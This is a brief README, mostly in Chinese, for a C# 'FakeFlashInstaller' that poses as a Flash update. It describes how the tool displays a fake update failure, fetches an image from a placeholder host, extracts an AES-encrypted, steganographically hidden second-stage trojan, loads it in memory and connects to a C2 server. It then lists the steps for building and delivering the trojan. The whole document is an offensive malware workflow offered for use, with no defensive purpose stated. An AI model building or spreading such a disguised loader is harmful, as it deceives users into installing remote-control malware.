FakeFlashInstaller

fake flash installer write in c#

原理

1. 跳转flash更新页面提示连接失败无法更新
2. Flash进程常驻后台开始使用AES解密Stage下载地址，前往Stage下载地址http://XXX/favicon.bmp 下载图片并解密隐写的二进制数据。
3. 通过loadAssembly加载二进制进行C2上线

用法

绘制flash界面：

将二阶段木马隐写入图片文件中

生成加密的图片URL地址

替换URL 配置

编译64位的Release进行投递